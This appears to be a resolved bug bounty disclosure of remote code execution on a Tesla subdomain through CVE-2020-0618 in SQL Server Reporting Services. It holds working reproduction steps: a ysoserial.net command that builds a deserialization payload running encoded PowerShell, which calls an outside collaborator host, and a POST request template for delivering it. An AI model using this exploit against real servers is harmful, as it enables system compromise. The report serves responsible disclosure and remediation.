RCE on https://beta-partners.tesla.com due to CVE-2020-0618

Disclosed by parzel
  • Program Tesla
  • Disclosed date about 2 months ago
  • Reward $10,000
  • Priority P1 Bugcrowd's VRT priority rating
  • Status Resolved This vulnerability has been accepted and fixed
Summary by parzel

It was possible for an attacker to gain Remote Code Execution because of a vulnerable SQL Server Reporting Services (CVE-2020-0618)

Report details
  • Submitted

  • Target Location

    *.tesla.com
  • Target category

    Website

  • VRT

    Server-Side Injection > Remote Code Execution (RCE)
  • Priority

    P1
  • Bug URL
    https://beta-partners.tesla.com/ReportServer/Pages/ReportViewer.aspx
  • Description

    Summary:

    Remote Code Execution on https://beta-partners.tesla.com due to vulnerable SQL Server Reporting Services (CVE-2020-0618).

    Impact:

    The impact is critical as the full system can be compromised with the attack.

    Reproduction:

    1) Download ysoserial.net to a windows system and unpack it to a folder (https://github.com/pwntester/ysoserial.net/releases/tag/v1.32)
    2) Generate a burp collaborator link or host your own webserver
    3) Generate your payload with the following snippet on the windows machine in the folder containing ysoserial.exe (replace the collaborator link with your link or your webserver):

    $command = 'Invoke-WebRequest -Uri https://l3pyrfttac5xvt9pe1vzxokv3m9cx1.burpcollaborator.net/POC'
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
    $encodedCommand = [Convert]::ToBase64String($bytes)
    .\ysoserial.exe -g TypeConfuseDelegate -f LosFormatter -c "powershell.exe -encodedCommand $encodedCommand" -o base64 | clip
    

    Screenshot from 2020-02-15 21-55-50.png
    4) Insert the payload which was copied to your clipboard in the previous step into the attached POST request and run it against the server
    Screenshot from 2020-02-15 21-56-11.png
    5) A Tesla machine will try to download something from your collaborator. You can of course modify the payload to run any other powershell code, which enables arbitrary code execution
    Screenshot from 2020-02-15 21-56-21.png

    Mitigation:

    Update SQL Server Reporting Services to the February 2020 patch level to fix the issue.

    Reference:

    https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/

  • HTTP request
    POST /ReportServer/Pages/ReportViewer.aspx HTTP/1.1
    Host: beta-partners.tesla.com
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: de,en-US;q=0.7,en;q=0.3
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Cookie: BIGipServer~TG-DMZ-PROD-APPS~DMZ-ORIGIN-PROD-SUP-WF1-HTTP=1670455562.20480.0000
    Upgrade-Insecure-Requests: 1
    Pragma: no-cache
    Content-Type: application/x-www-form-urlencoded
    Cache-Control: no-cache
    Content-Length: 3429
    
    NavigationCorrector$PageState=NeedsCorrection&NavigationCorrector$ViewState=[PAYLOAD_HERE]&__VIEWSTATE=